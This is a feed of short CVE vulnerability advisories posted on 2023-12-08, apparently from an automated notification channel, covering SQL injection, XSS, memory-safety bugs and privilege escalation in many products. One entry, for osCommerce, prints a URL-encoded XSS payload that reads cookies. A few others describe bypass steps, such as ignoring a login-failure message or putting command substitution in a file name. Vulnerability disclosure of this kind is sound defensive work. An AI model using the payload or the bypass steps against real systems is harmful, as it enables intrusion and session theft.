🚨 CVE-2017-20172A vulnerability was found in ridhoq soundslike. It has been classified as critical. Affected is the function get_song_relations of the file app/api/songs.py. The manipulation leads to sql injection. The patch is identified as 90bb4fb667d9253d497b619b9adaac83bf0ce0f8. It is recommended to apply a patch to fix this issue. VDB-218490 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-08 21:30:02 |
🚨 CVE-2023-45463Netis N3Mv2-V1.0.1.865 was discovered to contain a buffer overflow via the hostName parameter in the FUN_0040dabc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2023-12-08 21:30:01 |
🚨 CVE-2023-3085A vulnerability, which was classified as problematic, has been found in X-WRT luci up to 22.10_b202303061504. This issue affects the function run_action of the file modules/luci-base/ucode/dispatcher.uc of the component 404 Error Template Handler. The manipulation of the argument request_path leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 22.10_b202303121313 is able to address this issue. The patch is named 24d7da2416b9ab246825c33c213fe939a89b369c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230663.🎖@cveNotify |
|
| 2023-12-08 21:29:57 |
🚨 CVE-2023-21911Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-12-08 21:29:56 |
🚨 CVE-2014-125075A vulnerability was found in gmail-servlet and classified as critical. This issue affects the function search of the file src/Model.java. The manipulation leads to sql injection. The identifier of the patch is 5d72753c2e95bb373aa86824939397dc25f679ea. It is recommended to apply a patch to fix this issue. The identifier VDB-218021 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-08 21:00:03 |
🚨 CVE-2022-37051An issue was discovered in Poppler 22.07.0. There is a reachable abort which leads to denial of service because the main function in pdfunite.cc lacks a stream check before saving an embedded file.🎖@cveNotify |
|
| 2023-12-08 21:00:02 |
🚨 CVE-2023-2002A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication.🎖@cveNotify |
|
| 2023-12-08 21:00:01 |
🚨 CVE-2023-1380A slab-out-of-bound read problem was found in brcmf_get_assoc_ies in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux Kernel. This issue could occur when assoc_info->req_len data is bigger than the size of the buffer, defined as WL_EXTRA_BUF_MAX, leading to a denial of service.🎖@cveNotify |
|
| 2023-12-08 20:59:57 |
🚨 CVE-2014-125083A vulnerability has been found in Anant Labs google-enterprise-connector-dctm up to 3.2.3 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username/domain leads to sql injection. The patch is named 6fba04f18ab7764002a1da308e7cd9712b501cb7. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218911.🎖@cveNotify |
|
| 2023-12-08 20:59:56 |
🚨 CVE-2013-6282The (1) get_user and (2) put_user API functions in the Linux kernel before 3.5.5 on the v6k and v7 ARM platforms do not validate certain addresses, which allows attackers to read or modify the contents of arbitrary kernel memory locations via a crafted application, as exploited in the wild against Android devices in October and November 2013.🎖@cveNotify |
|
| 2023-12-08 20:30:15 |
🚨 CVE-2023-6619A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /modals/class_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247256.🎖@cveNotify |
|
| 2023-12-08 20:30:08 |
🚨 CVE-2023-6615A vulnerability, which was classified as problematic, has been found in Typecho 1.2.1. Affected by this issue is some unknown functionality of the file /admin/manage-users.php. The manipulation of the argument page leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-247250 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-08 20:30:07 |
🚨 CVE-2023-6610An out-of-bounds read vulnerability was found in smb2_dump_detail in fs/smb/client/smb2ops.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2023-12-08 20:30:03 |
🚨 CVE-2023-42559Improper exception management vulnerability in Knox Guard prior to SMR Dec-2023 Release 1 allows Knox Guard lock bypass via changing system time.🎖@cveNotify |
|
| 2023-12-08 20:30:02 |
🚨 CVE-2023-5808SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role.🎖@cveNotify |
|
| 2023-12-08 20:29:57 |
🚨 CVE-2014-125078A vulnerability was found in yanheven console and classified as problematic. Affected by this issue is some unknown functionality of the file horizon/static/horizon/js/horizon.instances.js. The manipulation leads to cross site scripting. The attack may be launched remotely. The patch is identified as 32a7b713468161282f2ea01d5e2faff980d924cd. It is recommended to apply a patch to fix this issue. VDB-218354 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-08 20:29:56 |
🚨 CVE-2014-125070A vulnerability has been found in yanheven console and classified as problematic. Affected by this vulnerability is the function get_zone_hosts/AvailabilityZonesTable of the file openstack_dashboard/dashboards/admin/aggregates/tables.py. The manipulation leads to cross site scripting. The attack can be launched remotely. The patch is named ba908ae88d5925f4f6783eb234cc4ea95017472b. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217651.🎖@cveNotify |
|
| 2023-12-08 20:00:02 |
🚨 CVE-2023-42562Integer overflow vulnerability in detectionFindFaceSupportMultiInstance of libFacePreProcessingjni.camera.samsung.so prior to SMR Dec-2023 Release 1 allows attacker to trigger heap overflow.🎖@cveNotify |
|
| 2023-12-08 20:00:01 |
🚨 CVE-2023-42561Heap out-of-bounds write vulnerability in bootloader prior to SMR Dec-2023 Release 1 allows a physical attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-12-08 19:30:04 |
🚨 CVE-2023-46246Vim is an improved version of the good old UNIX editor Vi. Heap-use-after-free in memory allocated in the function `ga_grow_inner` in in the file `src/alloc.c` at line 748, which is freed in the file `src/ex_docmd.c` in the function `do_cmdline` at line 1010 and then used again in `src/cmdhist.c` at line 759. When using the `:history` command, it's possible that the provided argument overflows the accepted value. Causing an Integer Overflow and potentially later an use-after-free. This vulnerability has been patched in version 9.0.2068.🎖@cveNotify |
|
| 2023-12-08 19:29:57 |
🚨 CVE-2023-4399Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, Request security is a deny list that allows admins to configure Grafana in a way so that the instance doesn’t call specific hosts.However, the restriction can be bypassed used punycode encoding of the characters in the request address.🎖@cveNotify |
|
| 2023-12-08 19:29:56 |
🚨 CVE-2023-34969D-Bus before 1.15.6 sometimes allows unprivileged users to crash dbus-daemon. If a privileged user with control over the dbus-daemon is using the org.freedesktop.DBus.Monitoring interface to monitor message bus traffic, then an unprivileged user with the ability to connect to the same dbus-daemon can cause a dbus-daemon crash under some circumstances via an unreplyable message. When done on the well-known system bus, this is a denial-of-service vulnerability. The fixed versions are 1.12.28, 1.14.8, and 1.15.6.🎖@cveNotify |
|
| 2023-12-08 19:00:02 |
🚨 CVE-2023-48695Azure RTOS USBX is a USB host, device, and on-the-go (OTG) embedded stack, that is fully integrated with Azure RTOS ThreadX. An attacker can cause remote code execution due to out of bounds write vulnerabilities in Azure RTOS USBX. The affected components include functions/processes in host and device classes, related to CDC ECM and RNDIS in RTOS v6.2.1 and below. The fixes have been included in USBX release 6.3.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-08 19:00:01 |
🚨 CVE-2023-40083In parse_gap_data of utils.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 18:59:57 |
🚨 CVE-2023-45252DLL Hijacking vulnerability in Huddly HuddlyCameraService before version 8.0.7, not including version 7.99, due to the installation of the service in a directory that grants write privileges to standard users, allows attackers to manipulate files, execute arbitrary code, and escalate privileges.🎖@cveNotify |
|
| 2023-12-08 18:59:56 |
🚨 CVE-2019-18279In Phoenix SCT WinFlash 1.1.12.0 through 1.5.74.0, the included drivers could be used by a malicious Windows application to gain elevated privileges. Adverse impacts are limited to the Windows environment and there is no known direct impact to the UEFI firmware. This was fixed in late June 2019.🎖@cveNotify |
|
| 2023-12-08 18:30:02 |
🚨 CVE-2023-40082In modify_for_next_stage of fdt.rs, there is a possible way to render KASLR ineffective due to improperly used crypto. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 18:30:01 |
🚨 CVE-2023-40081In loadMediaDataInBgForResumption of MediaDataManager.kt, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 18:29:57 |
🚨 CVE-2023-40079In injectSendIntentSender of ShortcutService.java, there is a possible background activity launch due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 18:29:56 |
🚨 CVE-2023-5915A vulnerability of Uncontrolled Resource Consumption has been identified in STARDOM provided by Yokogawa Electric Corporation. This vulnerability may allow to a remote attacker to cause a denial-of-service condition to the FCN/FCJ controller by sending a crafted packet. While sending the packet, the maintenance homepage of the controller could not be accessed. Therefore, functions of the maintenance homepage, changing configuration, viewing logs, etc. are not available. But the controller’s operation is not stopped by the condition.The affected products and versions are as follows: STARDOM FCN/FCJ R1.01 to R4.31.🎖@cveNotify |
|
| 2023-12-08 18:00:02 |
🚨 CVE-2023-40076In createPendingIntent of CredentialManagerUi.java, there is a possible way to access credentials from other users due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 18:00:01 |
🚨 CVE-2023-40075In forceReplaceShortcutInner of ShortcutPackage.java, there is a possible way to register unlimited packages due to a missing bounds check. This could lead to local denial of service which results in a boot loop with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 17:59:57 |
🚨 CVE-2023-40073In visitUris of Notification.java, there is a possible cross-user media read due to Confused Deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 17:59:56 |
🚨 CVE-2023-47100In Perl before 5.38.2, S_parse_uniprop_string in regcomp.c can write to unallocated space because a property name associated with a \p{...} regular expression construct is mishandled. The earliest affected version is 5.30.0.🎖@cveNotify |
|
| 2023-12-08 17:30:01 |
🚨 CVE-2023-49288Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Affected versions of squid are subject to a a Use-After-Free bug which can lead to a Denial of Service attack via collapsed forwarding. All versions of Squid from 3.5 up to and including 5.9 configured with "collapsed_forwarding on" are vulnerable. Configurations with "collapsed_forwarding off" or without a "collapsed_forwarding" directive are not vulnerable. This bug is fixed by Squid version 6.0.1. Users are advised to upgrade. Users unable to upgrade should remove all collapsed_forwarding lines from their squid.conf.🎖@cveNotify |
|
| 2023-12-08 17:29:57 |
🚨 CVE-2023-4295A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory.🎖@cveNotify |
|
| 2023-12-08 17:29:56 |
🚨 CVE-2023-33595CPython v3.12.0 alpha 7 was discovered to contain a heap use-after-free via the function ascii_decode at /Objects/unicodeobject.c.🎖@cveNotify |
|
| 2023-12-08 17:00:20 |
🚨 CVE-2016-6817The HTTP/2 header parser in Apache Tomcat 9.0.0.M1 to 9.0.0.M11 and 8.5.0 to 8.5.6 entered an infinite loop if a header was received that was larger than the available buffer. This made a denial of service attack possible.🎖@cveNotify |
|
| 2023-12-08 17:00:19 |
🚨 CVE-2016-6797The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not.🎖@cveNotify |
|
| 2023-12-08 17:00:18 |
🚨 CVE-2016-6794When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible.🎖@cveNotify |
|
| 2023-12-08 17:00:17 |
🚨 CVE-2016-0762The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.🎖@cveNotify |
|
| 2023-12-08 17:00:13 |
🚨 CVE-2017-5664The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, expected behaviour is to serve content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.🎖@cveNotify |
|
| 2023-12-08 17:00:12 |
🚨 CVE-2017-5648While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.🎖@cveNotify |
|
| 2023-12-08 17:00:11 |
🚨 CVE-2017-5647A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.🎖@cveNotify |
|
| 2023-12-08 17:00:07 |
🚨 CVE-2016-8747An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request.🎖@cveNotify |
|
| 2023-12-08 17:00:06 |
🚨 CVE-2016-3092The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.🎖@cveNotify |
|
| 2023-12-08 16:30:14 |
🚨 CVE-2023-48411In SignalStrengthAdapter::FillGsmSignalStrength() of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 16:30:13 |
🚨 CVE-2023-48409In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/mali_kbase_core_linux.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 16:30:12 |
🚨 CVE-2023-48407there is a possible DCK won't be deleted after factory reset due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 16:30:08 |
🚨 CVE-2023-48405there is a possible way for the secure world to write to NS memory due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 16:30:07 |
🚨 CVE-2023-48402In ppcfw_enable of ppcfw.c, there is a possible EoP due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 16:30:03 |
🚨 CVE-2023-48401In GetSizeOfEenlRecords of protocoladapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 16:30:02 |
🚨 CVE-2023-48398In ProtocolNetAcBarringInfo::ProtocolNetAcBarringInfo() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-08 16:30:01 |
🚨 CVE-2023-47565An OS command injection vulnerability has been found to affect legacy QNAP VioStor NVR models running QVR Firmware 4.x. If exploited, the vulnerability could allow authenticated users to execute commands via a network.We have already fixed the vulnerability in the following versions:QVR Firmware 5.0.0 and later🎖@cveNotify |
|
| 2023-12-08 16:29:57 |
🚨 CVE-2023-23372A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to inject malicious code via a network.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2425 build 20230609 and laterQTS 5.1.0.2444 build 20230629 and laterQTS 4.5.4.2467 build 20230718 and laterQuTS hero h5.1.0.2424 build 20230609 and laterQuTS hero h5.0.1.2515 build 20230907 and laterQuTS hero h4.5.4.2476 build 20230728 and later🎖@cveNotify |
|
| 2023-12-08 16:29:56 |
🚨 CVE-2023-24046An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to run arbitrary commands via use of a crafted string in the ping utility.🎖@cveNotify |
|
| 2023-12-08 15:30:15 |
🚨 CVE-2023-6611A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. This vulnerability affects unknown code of the file pda/pad/email/delete.php. The manipulation of the argument EMAIL_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-247246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-08 15:30:10 |
🚨 CVE-2023-6609A vulnerability was found in osCommerce 4. It has been classified as problematic. This affects an unknown part of the file /b2b-supermarket/catalog/all-products. The manipulation of the argument keywords with the input %27%22%3E%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-08 15:30:09 |
🚨 CVE-2023-6245The Candid library causes a Denial of Service while parsing a specially crafted payload with 'empty' data type. For example, if the payload is `record { * ; empty }` and the canister interface expects `record { * }` then the Rust candid decoder treats empty as an extra field required by the type. The problem with the type empty is that the candid Rust library wrongly categorizes empty as a recoverable error when skipping the field and thus causing an infinite decoding loop.Canisters using affected versions of candid are exposed to denial of service by causing the decoding to run indefinitely until the canister traps due to reaching maximum instruction limit per execution round. Repeated exposure to the payload will result in degraded performance of the canister. Note: Canisters written in Motoko are unaffected.🎖@cveNotify |
|
| 2023-12-08 15:30:08 |
🚨 CVE-2023-6146A Qualys web application was found to have a stored XSS vulnerability resulting from the absence of HTML encoding in the presentation of logging information to users. This vulnerability allowed a user with login access to the application to introduce XSS payload via browser details.🎖@cveNotify |
|
| 2023-12-08 15:30:07 |
🚨 CVE-2023-49487JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the navigation management department.🎖@cveNotify |
|
| 2023-12-08 15:30:03 |
🚨 CVE-2023-49485JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the column management department.🎖@cveNotify |
|
| 2023-12-08 15:30:02 |
🚨 CVE-2023-49444An arbitrary file upload vulnerability in DoraCMS v2.1.8 allow attackers to execute arbitrary code via uploading a crafted HTML or image file to the user avatar.🎖@cveNotify |
|
| 2023-12-08 15:30:01 |
🚨 CVE-2023-49443DoraCMS v2.1.8 was discovered to re-use the same code for verification of valid usernames and passwords. This vulnerability allows attackers to gain access to the application via a bruteforce attack.🎖@cveNotify |
|
| 2023-12-08 15:29:58 |
🚨 CVE-2023-5762The Filr WordPress plugin before 1.2.3.6 is vulnerable from an RCE (Remote Code Execution) vulnerability, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges.🎖@cveNotify |
|
| 2023-12-08 15:29:57 |
🚨 CVE-2023-6341Catalis (previously Icon Software) CMS360 allows a remote, unauthenticated attacker to view sensitive court documents by modifying document and other identifiers in URLs. The impact varies based on the intention and configuration of a specific CMS360 installation.🎖@cveNotify |
|
| 2023-12-08 15:29:56 |
🚨 CVE-2023-49091Cosmos provides users the ability self-host a home server by acting as a secure gateway to your application, as well as a server manager. Cosmos-server is vulnerable due to to the authorization header used for user login remaining valid and not expiring after log out. This vulnerability allows an attacker to use the token to gain unauthorized access to the application/system even after the user has logged out. This issue has been patched in version 0.13.0.🎖@cveNotify |
|
| 2023-12-08 14:59:57 |
🚨 CVE-2023-6063The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.🎖@cveNotify |
|
| 2023-12-08 14:59:56 |
🚨 CVE-2023-5884The Word Balloon WordPress plugin before 4.20.3 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to trick a logged in user to delete arbitrary avatars by clicking a link.🎖@cveNotify |
|
| 2023-12-08 14:30:16 |
🚨 CVE-2023-43742An authentication bypass in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an unauthenticated attacker to obtain an administrative session via a protection mechanism failure in the authentication function. In normal operation, the Zultys MX Administrator Windows client connects to port 7505 and attempts authentication, submitting the administrator username and password to the server. Upon authentication failure, the server sends a login failure message prompting the client to disconnect. However, if the client ignores the failure message instead and attempts to continue, the server does not forcibly close the connection and processes all subsequent requests from the client as if authentication had been successful.🎖@cveNotify |
|
| 2023-12-08 14:30:15 |
🚨 CVE-2023-6599Missing Standardized Error Handling Mechanism in GitHub repository microweber/microweber prior to 2.0.🎖@cveNotify |
|
| 2023-12-08 14:30:14 |
🚨 CVE-2023-5008Student Information System v1.0 is vulnerable to an unauthenticated SQL Injection vulnerability on the 'regno' parameter of index.php page, allowing an external attacker to dump all the contents of the database contents and bypass the login control.🎖@cveNotify |
|
| 2023-12-08 14:30:13 |
🚨 CVE-2023-5058Improper Input Validation in the processing of user-supplied splash screen during system boot in Phoenix SecureCore™ Technology™ 4 potentially allows denial-of-service attacks or arbitrary code execution.🎖@cveNotify |
|
| 2023-12-08 14:30:08 |
🚨 CVE-2023-6581A vulnerability has been found in D-Link DAR-7000 up to 20231126 and classified as critical. This vulnerability affects unknown code of the file /user/inc/workidajax.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-08 14:30:07 |
🚨 CVE-2023-6579A vulnerability, which was classified as critical, has been found in osCommerce 4. Affected by this issue is some unknown functionality of the file /b2b-supermarket/shopping-cart of the component POST Parameter Handler. The manipulation of the argument estimate[country_id] leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-247160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-08 14:30:06 |
🚨 CVE-2023-46693Cross Site Scripting (XSS) vulnerability in FormaLMS before 4.0.5 allows attackers to run arbitrary code via title parameters.🎖@cveNotify |
|
| 2023-12-08 14:30:03 |
🚨 CVE-2023-6578A vulnerability classified as critical has been found in Software AG WebMethods 10.11.x/10.15.x. Affected is an unknown function of the file wm.server/connect/. The manipulation leads to improper access controls. It is possible to launch the attack remotely. To access a file like /assets/ a popup may request username and password. By just clicking CANCEL you will be redirected to the directory. If you visited /invoke/wm.server/connect, you'll be able to see details like internal IPs, ports, and versions. In some cases if access to /assets/ is refused, you may enter /assets/x as a wrong value, then come back to /assets/ which we will show the requested data. It appears that insufficient access control is depending on referrer header data. VDB-247158 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-08 14:30:02 |
🚨 CVE-2023-38174Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-08 14:30:01 |
🚨 CVE-2023-36880Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-08 14:29:58 |
🚨 CVE-2023-35618Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-08 14:29:57 |
🚨 CVE-2023-5953The Welcart e-Commerce WordPress plugin before 2.9.5 does not validate files to be uploaded, as well as does not have authorisation and CSRF in an AJAX action handling such upload. As a result, any authenticated users, such as subscriber could upload arbitrary files, such as PHP on the server🎖@cveNotify |
|
| 2023-12-08 14:29:56 |
🚨 CVE-2023-6460A potential logging of the firestore key via logging within nodejs-firestore exists - Developers who were logging objects through this._settings would be logging the firestore key as well potentially exposing it to anyone with logs read access. We recommend upgrading to version 6.1.0 to avoid this issue🎖@cveNotify |
|
| 2023-12-08 13:29:56 |
🚨 CVE-2023-46157File-Manager in MGT CloudPanel 2.0.0 through 2.3.2 allows the lowest privilege user to achieve OS command injection by changing file ownership and changing file permissions to 4755.🎖@cveNotify |
|
| 2023-12-08 12:29:56 |
🚨 CVE-2023-3164A heap-buffer-overflow vulnerability was found in LibTIFF, in extractImageSection() at tools/tiffcrop.c:7916 and tools/tiffcrop.c:7801. This flaw allows attackers to cause a denial of service via a crafted tiff file.🎖@cveNotify |
|
| 2023-12-08 06:29:56 |
🚨 CVE-2023-32460Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation.🎖@cveNotify |
|
| 2023-12-08 05:29:56 |
🚨 CVE-2023-42568Improper access control vulnerability in SmartManagerCN prior to SMR Dec-2023 Release 1 allows local attackers to access arbitrary files with system privilege.🎖@cveNotify |
|
| 2023-12-08 04:29:56 |
🚨 CVE-2023-48122An issue in microweber v.2.0.1 and fixed in v.2.0.4 allows a remote attacker to obtain sensitive information via the HTTP GET method.🎖@cveNotify |
|
| 2023-12-08 03:30:01 |
🚨 CVE-2023-6510Use after free in Media Capture in Google Chrome prior to 120.0.6099.62 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-12-08 03:29:57 |
🚨 CVE-2023-46575A SQL injection vulnerability exists in Meshery prior to version v0.6.179, enabling a remote attacker to retrieve sensitive information and execute arbitrary code through the “order” parameter🎖@cveNotify |
|
| 2023-12-08 03:29:56 |
🚨 CVE-2022-43677In free5GC 3.2.1, a malformed NGAP message can crash the AMF and NGAP decoders via an index-out-of-range panic in aper.GetBitString.🎖@cveNotify |
|
| 2023-12-08 02:29:56 |
🚨 CVE-2023-43305An issue in studio kent mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2023-12-08 01:59:57 |
🚨 CVE-2014-125063A vulnerability was found in ada-l0velace Bid and classified as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The identifier of the patch is abd71140b8219fa8741d0d8a57ab27d5bfd34222. It is recommended to apply a patch to fix this issue. The identifier VDB-217625 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-08 01:59:56 |
🚨 CVE-2014-125062A vulnerability classified as critical was found in ananich bitstorm. Affected by this vulnerability is an unknown functionality of the file announce.php. The manipulation of the argument event leads to sql injection. The identifier of the patch is ea8da92f94cdb78ee7831e1f7af6258473ab396a. It is recommended to apply a patch to fix this issue. The identifier VDB-217621 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-08 01:30:04 |
🚨 CVE-2023-43744An OS command injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an administrator to execute arbitrary OS commands via a file name parameter in a patch application function. The Zultys MX Administrator client has a "Patch Manager" section that allows administrators to apply patches to the device. The user supplied filename for the patch file is passed to a shell script without validation. Including bash command substitution characters in a patch file name results in execution of the provided command.🎖@cveNotify |
|
| 2023-12-08 01:29:57 |
